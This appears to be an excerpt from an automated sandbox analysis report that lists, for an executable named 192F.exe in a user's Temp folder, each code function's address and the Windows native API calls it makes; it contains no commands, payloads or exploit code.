Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A1879 ZwAllocateVirtualMemory,memset,RtlInitializeSid, 29_2_6A9A1879
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92106F ZwOpenKey,ZwClose, 29_2_6A92106F
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959990 ZwQueryVolumeInformationFile, 29_2_6A959990
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91519E RtlEqualUnicodeString,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 29_2_6A91519E
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93C182 RtlGetCurrentServiceSessionId,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive, 29_2_6A93C182
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9DA189 RtlAcquireSRWLockExclusive,ZwGetNlsSectionPtr,RtlAllocateHeap,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive, 29_2_6A9DA189
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95B180 ZwWaitForAlertByThreadId, 29_2_6A95B180
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959980 ZwCreateEvent, 29_2_6A959980
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95A980 ZwQueryInstallUILanguage, 29_2_6A95A980
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9C6186 ZwQueryValueKey,memmove,RtlInitUnicodeString, 29_2_6A9C6186
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95A9B0 ZwQueryLicenseValue, 29_2_6A95A9B0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9951BE ZwQuerySystemInformation,ZwQuerySystemInformationEx,RtlAllocateHeap,ZwQuerySystemInformationEx,RtlFindCharInUnicodeString,RtlEnterCriticalSection,memcpy, 29_2_6A9951BE
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94C9BF DbgPrintEx,wcsrchr,memcpy,DbgPrintEx,ZwClose,DbgPrintEx,DbgPrintEx,RtlDosPathNameToRelativeNtPathName_U,DbgPrintEx,ZwOpenFile,ZwClose,RtlFreeHeap,DbgPrintEx,DbgPrintEx,DbgPrintEx,RtlDeleteBoundaryDescriptor,ZwClose,RtlFreeHeap, 29_2_6A94C9BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9EF1B5 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap, 29_2_6A9EF1B5
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95B1A0 ZwWaitForKeyedEvent, 29_2_6A95B1A0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D49A4 ZwAllocateVirtualMemory,RtlCompareMemory,memcpy,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint, 29_2_6A9D49A4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A19C8 ZwCreateSection,ZwMapViewOfSection,memset,ZwUnmapViewOfSection,ZwClose, 29_2_6A9A19C8
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91F1E4 ZwEnumerateValueKey, 29_2_6A91F1E4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E89E7 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9E89E7
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91E9ED RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwOpenKey,ZwClose,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwOpenKey,ZwClose,ZwClose,RtlFreeHeap, 29_2_6A91E9ED
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A919100 TpReleasePool,RtlAcquireSRWLockExclusive,ZwShutdownWorkerFactory,RtlGetCurrentServiceSessionId,TpReleasePool,TpReleasePool,RtlDebugPrintTimes,TpReleasePool, 29_2_6A919100
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A920100 LdrUnloadAlternateResourceModuleEx,RtlAcquireSRWLockExclusive,ZwUnmapViewOfSection,ZwClose,LdrUnloadAlternateResourceModuleEx,RtlFreeHeap,RtlFreeHeap,RtlReAllocateHeap, 29_2_6A920100
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959900 ZwOpenEvent, 29_2_6A959900
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9B5100 RtlAssert,RtlCaptureContext,DbgPrintEx,DbgPrompt,ZwTerminateThread,DbgPrintEx,RtlAssert,ZwTerminateProcess, 29_2_6A9B5100
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A193B ZwRaiseException,ZwTerminateProcess, 29_2_6A9A193B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95A130 ZwCreateWaitCompletionPacket, 29_2_6A95A130
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9EF13B ZwOpenKey,ZwCreateKey, 29_2_6A9EF13B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A934120 RtlAllocateHeap,memmove,memmove,RtlPrefixUnicodeString,RtlAllocateHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlFreeHeap, 29_2_6A934120
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959920 ZwDuplicateToken, 29_2_6A959920
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91F150 RtlOpenCurrentUser,RtlFormatCurrentUserKeyPath,ZwOpenKey,RtlFreeUnicodeString,RtlOpenCurrentUser,RtlInitUnicodeString,ZwOpenKey, 29_2_6A91F150
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95B150 ZwUnsubscribeWnfStateChange, 29_2_6A95B150
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91395E RtlAcquireSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwGetCompleteWnfStateSubscription,RtlFreeHeap, 29_2_6A91395E
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93B944 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,RtlGetCurrentServiceSessionId,ZwSetTimer2,RtlGetCurrentServiceSessionId,ZwCancelTimer2, 29_2_6A93B944
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91B171 ZwQueryDebugFilterState,_alloca_probe_16,memcpy,_vsnprintf,ZwWow64DebuggerCall,RtlRaiseException, 29_2_6A91B171
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94D976 ZwCreateFile,ZwCreateFile, 29_2_6A94D976
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A1976 ZwCreateEvent, 29_2_6A9A1976
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95B160 ZwUpdateWnfStateData, 29_2_6A95B160
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95A160 ZwCreateWorkerFactory, 29_2_6A95A160
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8966 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9E8966
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CBE9B RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive, 29_2_6A9CBE9B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94DE9E RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwUnsubscribeWnfStateChange,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap, 29_2_6A94DE9E
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912E9F ZwCreateEvent,ZwClose, 29_2_6A912E9F
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A913E80 RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A913E80
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E3EBC ZwTraceControl,RtlNtStatusToDosError,RtlSetLastWin32Error, 29_2_6A9E3EBC
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93E6B0 RtlSetThreadWorkOnBehalfTicket,memcmp,ZwSetInformationThread,RtlSetThreadWorkOnBehalfTicket, 29_2_6A93E6B0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959EA0 ZwCompareSigningLevels, 29_2_6A959EA0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A2EA3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9A2EA3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A949ED0 RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlAcquireSRWLockShared,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,ZwWaitForAlertByThreadId, 29_2_6A949ED0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9596D0 ZwCreateKey, 29_2_6A9596D0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9166D4 RtlInitUnicodeString,ZwQueryValueKey, 29_2_6A9166D4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8ED6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9E8ED6
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912ED8 ZwWaitForAlertByThreadId,ZwWaitForAlertByThreadId, 29_2_6A912ED8
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9596C0 ZwSetInformationProcess, 29_2_6A9596C0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A16FA ZwQueryWnfStateNameInformation,ZwUpdateWnfStateData,EtwEventWriteNoRegistration, 29_2_6A9A16FA
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91B6F0 EtwEventWriteNoRegistration,ZwTraceEvent,RtlNtStatusToDosError, 29_2_6A91B6F0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A96DEF0 RtlRaiseException,RtlCaptureContext,ZwRaiseException,RtlRaiseStatus, 29_2_6A96DEF0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93E6F9 ZwAlpcSetInformation, 29_2_6A93E6F9
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9276FE RtlInitUnicodeString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,ZwOpenKey,ZwClose, 29_2_6A9276FE
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9596E0 ZwFreeVirtualMemory, 29_2_6A9596E0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959610 ZwEnumerateValueKey, 29_2_6A959610
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A952E1C RtlInitializeCriticalSectionEx,ZwDelayExecution, 29_2_6A952E1C
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A2E14 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9A2E14
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91C600 LdrQueryImageFileKeyOption,RtlInitUnicodeStringEx,ZwQueryValueKey,LdrQueryImageFileKeyOption,RtlFreeHeap,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,RtlUnicodeStringToInteger,memcpy, 29_2_6A91C600
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91B630 ZwWaitForKeyedEvent, 29_2_6A91B630
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CFE3F memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9CFE3F
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959E30 ZwCancelWaitCompletionPacket, 29_2_6A959E30
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959E20 ZwCancelTimer2, 29_2_6A959E20
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E3E22 ZwTraceControl,RtlNtStatusToDosError,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error, 29_2_6A9E3E22
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95B650 RtlUnhandledExceptionFilter,ZwTerminateProcess, 29_2_6A95B650
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959650 ZwQueryValueKey, 29_2_6A959650
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A6652 ZwClose,RtlAllocateHeap,memcpy,ZwUnmapViewOfSection, 29_2_6A9A6652
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95B640 RtlUnhandledExceptionFilter,ZwTerminateProcess, 29_2_6A95B640
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95AE70 ZwSetInformationWorkerFactory, 29_2_6A95AE70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959670 ZwQueryInformationProcess, 29_2_6A959670
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94BE62 ZwProtectVirtualMemory,RtlGetCurrentTransaction,RtlGetCurrentTransaction, 29_2_6A94BE62
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94FF9C RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlInitUnicodeString, 29_2_6A94FF9C
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A5780 DbgPrompt,ZwWow64DebuggerCall, 29_2_6A9A5780
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9C5F87 ZwUnmapViewOfSection, 29_2_6A9C5F87
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912FB0 RtlDestroyHeap,RtlDeleteCriticalSection,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlDestroyHeap,DbgPrint,DbgPrint,DbgPrint,RtlDebugPrintTimes,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A912FB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A99A7AC ZwCompareSigningLevels,ZwCompareSigningLevels, 29_2_6A99A7AC
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9597A0 ZwUnmapViewOfSection, 29_2_6A9597A0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A953FA0 RtlGetLocaleFileMappingAddress,ZwInitializeNlsFiles,RtlGetLocaleFileMappingAddress,ZwUnmapViewOfSection, 29_2_6A953FA0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95AFD0 ZwShutdownWorkerFactory, 29_2_6A95AFD0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94DFDF RtlWakeAddressAllNoFence,ZwAlertThreadByThreadId,RtlWakeAddressAllNoFence, 29_2_6A94DFDF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91F7C0 EtwNotificationUnregister,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwClose,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,EtwNotificationUnregister, 29_2_6A91F7C0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9597C0 ZwTerminateProcess, 29_2_6A9597C0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94D7CA RtlImageNtHeader,RtlFreeHeap,ZwCreateSection,ZwMapViewOfSection,ZwClose,RtlImageNtHeader,ZwClose,RtlFreeHeap,ZwClose,ZwClose,ZwUnmapViewOfSection, 29_2_6A94D7CA
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A920FFD RtlInitUnicodeString,ZwQueryValueKey, 29_2_6A920FFD
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A0FEC ZwDuplicateObject,ZwDuplicateObject, 29_2_6A9A0FEC
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9437EB RtlImageNtHeader,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,ZwCreateIoCompletion,ZwCreateWorkerFactory,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwSetInformationWorkerFactory, 29_2_6A9437EB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959710 ZwQueryInformationToken, 29_2_6A959710
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A6715 memset,memcpy,ZwTraceEvent, 29_2_6A9A6715
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A949702 RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwReleaseWorkerFactoryWorker, 29_2_6A949702
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid, 29_2_6A94E730
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959730 ZwQueryVirtualMemory, 29_2_6A959730
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CCF30 ZwAlertThreadByThreadId, 29_2_6A9CCF30
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959750 ZwQueryInformationThread, 29_2_6A959750
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A5F5F RtlInitUnicodeString,ZwOpenFile,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlAllocateHeap,RtlInitUnicodeString,ZwQueryDirectoryFile,RtlAllocateHeap,memcpy,RtlFreeHeap,ZwClose, 29_2_6A9A5F5F
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959740 ZwOpenThreadToken, 29_2_6A959740
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A950F48 ZwOpenKey,ZwClose,ZwClose,ZwCreateKey,RtlInitUnicodeStringEx,ZwSetValueKey,RtlInitUnicodeStringEx,ZwSetValueKey,ZwClose, 29_2_6A950F48
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94174B ZwFreeVirtualMemory,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory, 29_2_6A94174B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A99A746 ZwGetCachedSigningLevel,ZwCompareSigningLevels,ZwSetCachedSigningLevel, 29_2_6A99A746
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959F70 ZwCreateIoCompletion, 29_2_6A959F70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959770 ZwSetInformationFile, 29_2_6A959770
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CCF70 RtlpGetUserOrMachineUILanguage4NLS,RtlInitUnicodeString,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,ZwClose, 29_2_6A9CCF70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A916F60 RtlGetPersistedStateLocation,ZwOpenKey,memcpy,RtlGetPersistedStateLocation,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwQueryValueKey,RtlExpandEnvironmentStrings,memcpy,ZwClose,ZwClose,RtlFreeHeap, 29_2_6A916F60
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8F6A RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9E8F6A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95AF60 ZwSetTimer2, 29_2_6A95AF60
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A176C ZwOpenEvent,ZwWaitForSingleObject,ZwClose, 29_2_6A9A176C
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94CF6A memcpy,memcpy,RtlDosPathNameToRelativeNtPathName_U,ZwOpenFile,memcpy,RtlFreeHeap,RtlDeleteBoundaryDescriptor,DbgPrintEx,DbgPrintEx,DbgPrintEx,ZwClose,RtlFreeHeap,DbgPrintEx,memcpy,DbgPrintEx,ZwClose, 29_2_6A94CF6A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A993C93 wcschr,RtlInitUnicodeString,wcstoul,RtlAnsiStringToUnicodeString,RtlCompareUnicodeString,ZwProtectVirtualMemory,DbgPrintEx,RtlFreeUnicodeString, 29_2_6A993C93
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91EC9B RtlInitUnicodeString,ZwOpenKey,RtlpLoadUserUIByPolicy,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlFreeHeap,ZwClose,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlAllocateHeap,RtlpLoadMachineUIByPolicy,ZwClose, 29_2_6A91EC9B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 ZwAllocateVirtualMemory,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint, 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95A480 ZwInitializeNlsFiles, 29_2_6A95A480
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E9CB3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9E9CB3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A950CA1 ZwQuerySecurityAttributesToken,ZwQuerySecurityAttributesToken,ZwQuerySecurityAttributesToken, 29_2_6A950CA1
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E4CAB ZwTraceControl, 29_2_6A9E4CAB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8CD6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9E8CD6
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912CDB RtlFreeHeap,ZwClose,ZwSetEvent, 29_2_6A912CDB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94CCC0 memcpy,RtlGetNtSystemRoot,RtlInitUnicodeString,memcpy,ZwOpenKey,ZwClose,ZwEnumerateKey,DbgPrintEx,DbgPrintEx,DbgPrintEx, 29_2_6A94CCC0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95A4C0 ZwIsUILanguageComitted, 29_2_6A95A4C0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D14FB memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9D14FB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9C64FB ZwOpenKey,ZwQueryValueKey,RtlEqualUnicodeString,RtlEqualUnicodeString,RtlEqualUnicodeString,ZwClose, 29_2_6A9C64FB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91F4E3 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent, 29_2_6A91F4E3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A1CE4 ZwQueryInformationProcess, 29_2_6A9A1CE4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A950413 ZwUnmapViewOfSection, 29_2_6A950413
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8C14 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9E8C14
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1411 ZwTraceEvent, 29_2_6A9D1411
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93FC39 ZwAssociateWaitCompletionPacket, 29_2_6A93FC39
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91E420 RtlpLoadUserUIByPolicy,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlpLoadUserUIByPolicy,ZwClose, 29_2_6A91E420
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95A420 ZwGetNlsSectionPtr, 29_2_6A95A420
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A915450 RtlClearThreadWorkOnBehalfTicket,memcmp,RtlClearThreadWorkOnBehalfTicket,ZwSetInformationThread, 29_2_6A915450
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A1C49 ZwQueryInformationProcess, 29_2_6A9A1C49
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959C40 ZwAllocateVirtualMemoryEx, 29_2_6A959C40
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959C70 ZwAlpcConnectPort, 29_2_6A959C70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A955C70 TpSetPoolMaxThreadsSoftLimit,ZwSetInformationWorkerFactory, 29_2_6A955C70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8C75 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9E8C75
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A1C76 ZwQueryInformationProcess, 29_2_6A9A1C76
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94AC7B ZwFreeVirtualMemory,RtlFillMemoryUlong,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,DbgPrint,DbgPrint,DbgPrint, 29_2_6A94AC7B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9C3C60 RtlFlushSecureMemoryCache,ZwQueryVirtualMemory, 29_2_6A9C3C60
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93746D RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 29_2_6A93746D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A913591 ZwSetInformationFile, 29_2_6A913591
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92DD80 RtlAcquireSRWLockShared,ZwQueryVirtualMemory,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlRaiseStatus,RtlAddressInSectionTable,RtlImageDirectoryEntryToData, 29_2_6A92DD80
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9DB581 RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9DB581
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1582 ZwTraceEvent, 29_2_6A9D1582
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9595B0 ZwSetInformationThread, 29_2_6A9595B0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959DB0 ZwAlpcSetInformation, 29_2_6A959DB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9165A0 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion, 29_2_6A9165A0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959DA0 ZwAlpcSendWaitReceivePort, 29_2_6A959DA0
